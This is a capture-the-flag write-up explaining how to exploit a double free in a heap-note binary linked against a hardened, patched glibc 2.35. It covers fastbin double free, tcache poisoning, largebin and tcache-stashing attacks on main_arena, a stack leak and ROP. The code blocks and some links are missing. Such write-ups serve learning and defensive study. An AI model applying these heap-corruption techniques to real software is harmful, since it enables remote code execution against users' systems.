locked room
Last updated
Was this helpful?
Last updated
Was this helpful?
locked_room
was a difficult heap challenge from this CTF, where the gimmick was that the libc was patched with multiple security mitigations. I didn't solve it during this CTF (rip), but I did get close, and managed to solve it the next day. Anways, let the madness begin.
As expected, we have full protections on the main binary, cos why not.
The binary itself also isn't tooo interesting, just a simple heap note with just alloc
, free
and view
:
Emphasis on simple, as a common pattern in this binary, and the challenge as a whole, is that barebones functions like read
, write
and _exit
are used instead of IO functions and exit
which have complexity that can be attacked and manipulated, which reduces our options for RCE :(
The bug isn't too hard to spot: when a chunk is freed, its .len
field is nulled, but not the pointer itself, and since there's no check in free_chunk
for .len == 0
, nothing stops us from freeing a chunk twice!
Well, nothing in the program at least. The interesting part of the challenge comes from the libc.patch
file we're given, which changes the malloc/
code in glibc source (version 2.35).
Firstly, it introduces a new bit flag to put in size fields of chunks. The idea is to track which chunks have been freed to the fastbin, similarly to PREV_INUSE
with unsortedbin/smallbin/largebins, so that double frees can be better detected, as current measures are easy to bypass, along with other fastbin sanity checks.
It also doubles as an anti-debugging measure, as vis_heap_chunks
struggles when faced with this flag >:(
RIP tcache, you will be missed, as it now has the same check for a valid size field that fastbin does. This, along with the requirement that tcache (and fastbin) chunks are 16-byte aligned (so no misaligned size tricks), basically kills tcache as an easy win.
This is arguably the most annoying change, which restricts where our allocations can be.
Maximum address is top + chunksize(top)
, which points to the end of the (allocated) heap region, and the minimum address is the maximum minus av->system_mem
, which is the total amount of memory currently allocated for that region, so the minimum would be the start of the region.
It also prevents the end of our chunk coming after the top chunk, so no overlapping chunks with the top chunk to corrupt it, or allocating past it.
One interesting thing to note here though, is that there's a call to strlen
, which when used in libc, is called using libc's PLT and GOT, as it can use different architecture specific implementations like SSE2 or AVX2.
Since we're using glibc 2.35, libc GOT is still writable (due to Partial RELRO
), so this could be an avenue for code execution (however it's not what I used).
There are a few more, smaller changes, such as:
Nulling more leftover pointers in malloc
.
Only recognising main_arena
: arena_for_chunk
always returns &main_arena
. (For this reason, when I refer to av
, this will be the same as main_arena
).
One thing that you may find helpful when doing this challenge is to have reference to patched malloc.c
file, as this will help with reading the new source code, but also gdb
will recognise malloc.c
and you can debug malloc
and free
with source code. Just copy the malloc/malloc.c
and malloc/arena.c
files to your system, then do:
So it looks like we've got our work cut out for us here. Let's start off easy, and write our handlers and get our leaks:
alloc_chunk
works by setting the .len
of a chunk to the amount of data we read in the read
call, so no read OOB, and .len
is nulled on a free, so no read after free either + pointers nulled on malloc
call.
Fortunately we can use the UAF to overlap chunks to get leak. The basic idea is:
Allocate a chunk a
, then free it.
Reallocate it with another chunk b
, setting b.len
to a suitable length.
With UAF, free a
again. Since a = b
, we have UAF on b
!
Now use b
to read the freed chunk.
I opted to use a large chunk bordering the top chunk, effectively UAFing the top chunk, then any allocation would overlap with the UAFed one.
A useful tool for solving heap challenges is tcache_perthread_struct
, a goldmine for arbitrary writes, and it will be useful here too (even if it's only on the heap for now).
The problem is, to get initial corruption we only have a double free, and in this version of libc, double frees are heavily mitigated: tcache can't be double freed without a write after free, and the doubly linked list bins like unsortedbin also have measures. Normally we could use the fastbin double free trick, but now we have PREV_FAST_FREED
, so ideally we want to find a way to clear that bit.
Thankfully the patch isn't completely thorough in its enforcement of PREV_FAST_FREED
. Looking through the patch for references to setting PREV_FAST_FREED
, we can notice that there's some instances where it's left out.
For example, the above snippet is untouched by the patch, and is for when an allocation is serviced from the top chunk. victim
is the chunk that will be allocated and returned to the user, and we can see that it will have the PREV_INUSE
bit set, and maybe the NON_MAIN_ARENA
bit, but no reference to PREV_FAST_FREED
.
In other words, if the top chunk has PREV_FAST_FREED
, it won't be preserved.
So now we have a plan for a double free on fastbin:
Allocate 2 chunks a
and b
, such that b
borders the top chunk.
Free b
to fastbin. This sets top chunk's PREV_FAST_FREED
.
Allocate from top chunk to clear PREV_FAST_FREED
.
Free a
then b
.
Chunk a
is still needed to avoid the other double free protection, where it checks that the fastbin chunk being freed isn't at the top of fastbin.
We can then use this to get an allocation on the heap to poison the fd
pointer of a tcache[0x290]
chunk, and point that to heap_base+0x10
, and now we control all tcache allocations!
We can now corrupt the heap to our liking .... so what?
We still have the tcache size and min/max address restrictions in play, so we can't aim our tcache allocations anywhere interesting. Ideally we'd want to corrupt the main_arena->top
and main_arena->system_mem
fields to adjust the min/max addresses, and open up our arbitrary allocation possibilites, but how do we do that without allocating onto them???
Just because we can't allocate outside the heap, doesn't mean we can't write anything! Introducing the largebin attack, which can be used to write a heap address to anywhere in memory, while only allocating inside the heap. While a heap address isn't too versatile, as in we can't write any libc addresses or code pointers, it's still useful, because what we can do is aim this at main_arena->system_mem
to increase the range!
Pick a largebin to use, such as 0x400-0x430
.
Allocate 2 chunks a
and b
belonging to this largebin, where b
is smaller than a
(and separated from each other and top chunk).
Free a
to the unsortedbin.
Allocate a chunk larger than a
to send a
to largebin[0x400-0x430]
.
Free b
to unsortedbin.
Overwrite a->bk_nextsize
to target-0x20
.
Allocate a chunk larger than a
(and b
).
This will write the address of b
to target
, which in our case is main_arena->system_mem
!
One important thing to note about overwriting main_arena->system_mem
is that we don't want to make it too large. If it's much greater than av->top
, then the calculation:
Will underflow and become "negative", and since the comparisons are unsigned, then the min_address
will be VERY large, and thus none of our allocations will be valid.
So far we can shrink min_address
, but (for now) this is only useful for maybe allocating on the binary's writable area. However given:
The protections of locked_room
, like FULL RELRO
.
The lack of an edit
function, meaning we can't just overwrite pointers for an easy arbitrary write (would work for arbitrary read though).
The lack of a PIE leak.
This isn't much of a viable option. While we could overwrite the size of the top chunk to increase the max_address
, this wouldn't be very helpful as the ends of our chunks, and thus the chunks themselves, can't be after the top chunk. And even though our system_mem
is large now, we can't do a house of force since our allocation sizes are capped at 0x800
. So we'd need to overwrite av->top
to a greater address.
The largebin attack can only write heap addresses (and ones lower than av->top
for that matter). While we could misalign the largebin attack , such as writing it to &av->top + 1
to make it much larger, we still need av->top
to be a valid address, as it needs to be able to access chunksize(av->top)
.
So ideally we'd want to be able to write a libc or stack address, depending on the route for RCE you take, but how can we do that?
One way could be allocating somewhere before &av->top
and overwriting av->top
, but that just shifts the problem to:
How to increase av->top
enough to come after &av->top
.
How to write a fake size field before &av->top
(for a tcache/fastbin allocation).
Thankfully there is another attack which solves the 1st problem, this time involving smallbins and tcache, which can be used similarly to a largebin attack, but this allows us to write a libc address instead. But how?
If the smallbin (for the size nb
) is non-empty, it unlinks the last chunk (bin->bk
) and returns it. But before returning, it will then check if there are other smallbin chunks that could be linked into the tcachebin of that same size.
Now it iterates through the smallbin until either it's empty, or the tcache is full (this part is important), unlinking smallbin chunks the same way it was before, then adding the chunks to the tcache.
Interestingly, the check bck->fd != victim
is absent in the loop, so nothing really stops us overwriting a ->bk
field in one of these tc_victim
chunks, to control bck
. If we did that, then it would reach the line bck->fd = bin
, and would write the address of the smallbin (which is located in main_arena
) to bck+0x10
!
One issue to deal with is what happens after this?
Since bin->bk = bck;
is also triggered, we have last(bin) = bck
, so we go to that chunk next in the loop, where we may face problems (depending on what our bck
was).
This is where that tcache being full check comes into play. While it will believe there's more from the smallbin, if the tc_victim
(with the malicious bck
) was the 7th chunk for that tcache bin (i.e. tcache is now full), then it will terminate, and not do anything more with the bck
.
We can use this to overwrite target=&av->top
with a libc address as follows:
Allocate 8 smallbin-sized chunks (again, separated from each other and the top chunk)
Fill tcache of the same size.
Free those 8 chunks (to unsortedbin).
Allocate a bigger chunk to send them all to smallbin.
Overwrite the ->bk
field of the last freed smallbin chunk to target-0x10
. This will be the last chunk used in the loop (i.e. bin->fd
).
Allocate a chunk of the same smallbin size.
The last allocated chunk will be serviced by the first freed smallbin chunk (bin->bk
), and then the remaining 7 smallbin chunks are sent to tcache, while also writing to av->top
!
This will have a small (or rather, large) issue. See, when av->top
points into av->bins
, while we have solved the problem of our allocations coming before av->top
, we run into another issue: the top chunk size.
The .bins
array is initially set up so that for every bin index i
:
The way this is done is by have the fd
and bk
pointers point -0x10
back, so the bin->prev_size
and bin->size
overlap with the previous bin's fd
and bk
pointers.
This means that chunksize(av->top)
will be the previous smallbin's bk
pointer, by default a libc address, and because av->system_mem
is a heap address, min_address
will be too large for the main_arena
allocation (0x7f... + 0x7f... - 0x55... ≈ 0xa9...
).
While we could lower that bk
pointer to a heap address by having chunks freed to that smallbin, so that the main_arena
allocation could still work, we need to keep in mind how the tcache stashing write works. When we trigger the actual write, we allocate a smallbin chunk back on the heap, so when av->top
is overwritten, it will then check if that heap chunk is valid, which it won't be due to the top chunk size.
So we need to lower that even further. For this, we can use another largebin attack! While it does only write a heap address, we can actually misalign this write by -2
so that the top 2 null bytes of the address overwrite the greatest 2 bytes of the bk
pointer. This will shrink it to a 32 bit integer (from 48 bits), which is plenty small enough for that min_address
calculation to be below the heap region.
This will need to be done before the tcache stashing attack, and will completely corrupt the previous smallbin, but again, who actually cares.
Now that we can, in theory, setup the conditions for an allocation onto main_arena
and overwrite av->top
, we need to decide what we want to target.
The avenue I went down was the classic "overwrite the return address", but for that we're gonna need a stack leak. But how? Even if we could allocate on/near something like environ
or __libc_argv
, the view
would only allow us to read the data we send (due to how .len
is set), so the only way of reading the data at these variables is to overwrite them.
So it seems the only way to get a data leak is to bring it to you (i.e. into your chunk), rather than bringing our chunks to the data, which is similar to what we did when leaking libc and heap. Thankfully, we can use our good ol' friend tcache stashing to do this.
The idea is we can "link" a stack address into a smallbin by pointing a bk
pointer to it, then when the tcache stashing occurs, the stack address is the last tc_victim
, and will be put into the head of the tcachebin (i.e. into tcache_perthread_struct
), and since we control the allocation over tcache_perthread_struct
, we can then view it to leak the stack.
So the key difference between the setup here and before, is we use 2 less smallbin chunks (8 -> 6), and we point bk
to target-0x18
, where target
contains a stack address. This results in target-0x18
being the 6th chunk linked into tcache, then finally its bk
pointer (our stack address) is the 7th and final tc_victim
. And of course, since the tcache is full after linking the stack address into tcache, it terminates the loop.
Allocating on the stack will be made more difficult by the existence of canaries, as we don't have a good way of leaking them. Like I mentioned earlier, the view
function makes leaking data with allocations difficult, and we can't use the tcache stashing trick to leak them as they need to be a writable address.
Canaries do get replaced all the time, so maybe you could overwrite a canary with an allocation, then later it comes back, but then it would detect stack smashing.
main
has a canary that doesn't get used, but also wouldn't be replaced, so no leak there. And since it doesn't return, the main target is alloc_chunk
. So if we can't leak it, can we skip it?
Well we don't have any candidates for a tcache/fastbin allocation, but interestingly we don't actually need those: we can use av->top
.
Once we have av->top
pointing into main_arena
, before we fully control av->top
using the tcache allocation, a useful preparation step is alloating from av->top
to overwrite the bins
array to clean up the largebins. Largebins being corrupted from the largebin attacks does cause us problems when allocating from the top chunk.
Firstly, if our allocations our smaller than the largebin chunks, they will be serviced using those (through remaindering), and not the top chunk. And we can't just empty largebins, as they're corrupted. So if we use chunks larger than the largebins, we bypass this, so we're fine, right?
Not quite, because once we setup the tcache write into main_arena
, the fastbin array is corrupted, and thus any large allocations will fail due to malloc_consolidate
, so we wouldn't be able to allocate larger than largebins to bypass them.
This is a simple fix, it just requires fixing the pointers in av->bins
:
Now we (finally) have all the components for an exploit, so let's put it together:
Use double free to overlap chunks with a freed chunks, for heap and libc leaks.
Get double free on fastbins by clearing PREV_FAST_FREED
using top chunk allocation to poison fastbin.
Use this fastbin to poison tcache[0x290]
to allocate onto tcache_perthread_struct
for infinite writes.
Allocate chunks necessary for:
Putting fake tcache size into the fastbin array, specifically fastbin[0x70]
(size chosen for alignment reasons).
The 2 largebin attacks.
The 2 tcache stashing attacks.
Perform largebin attack against main_arena->system_mem
first to decrease min_address
enough to be able to still do heap allocations once av->top
has been controlled.
Perform largebin attack against main_arena+262
(using larger sizes than for the previous one to avoid reallocation), which is a misaligned write on smallbin[0xa0]
to setup top chunk size for later.
Do tcache stashing to leak __libc_argv
for a stack leak.
Do tcache stashing against main_arena->top
using smallbin[0xb0]
, which writes the address of &smallbin[0xa0]
to main_arena->top
(which has the fake top chunk size).
Do an allocation larger than (corrupted) largebins to allocate from the new av->top
to clean up the largebins.
Put fake tcache size into the fastbin array (this must be done after all the largebin allocations to avoid malloc_consolidate
)
Allocate on main_arena
using tcache to overwrite main_arena->top
to point to our target on the stack.
Use smallbin-sized allocation to allocate on the stack using top chunk, overwrite the return address to get ROP!
dice{without_love..._'the_flag'_cannot_be_seen...!}
These changes seem to be adapated from , and thankfully they only used those, cos the debug chunks are
Like I mentioned earlier, a pattern is using barebones functions, to reduce the attack surface for RCE, so now we can't use stderr
or .
While this only decreases the minimum address for now, it's a useful first step, and sets up future attacks
has a useful demo of this attack, but this is a brief overview of how to do it against some address target
:
An attack that would have worked well for the 1st problem was the , which was like the largebin attack, except it could write a libc address instead. And not just any libc address, but it came from &av->bins
, which comes after &av->top
.
Shame too, because there's actually a relatively simple solution to the 2nd problem. As you can see above in , the fastbin array is right before ->top
, and since we easily corrupt fastbin (using our tcache writes), we could bring any pointer to the head of a fastbin, but that could also be any value, such as a fake size field for a fake tcache chunk. Of course we couldn't allocate from this fastbin, and largebin allocations would fail because malloc_consolidate()
would attempt to dereference this, but who actually cares?
The mechanism responsible for this involves moving smallbin chunks to tcache (i.e. stashing them in tcache). This is triggered in , specifically the initial case when it's allocating from a smallbin:
I originally found out about this technique (and tcache stashing in general) from .
av->top
doesn't have alignment restrictions like tcache/fastbins, and as long as chunksize(av->top) <= av->system_mem
() then the top chunk size is considered valid. So we could actually just use the PIE address after the canary as a top chunk size, as av->system_mem
is a heap address, and thus will always be bigger (you could also misalign the size to make it smaller, as it's followed by a 0
).
gdb
with patched source codejb
after _int_mallocmain_arena.bins
alloc_chunk
stack (before read
)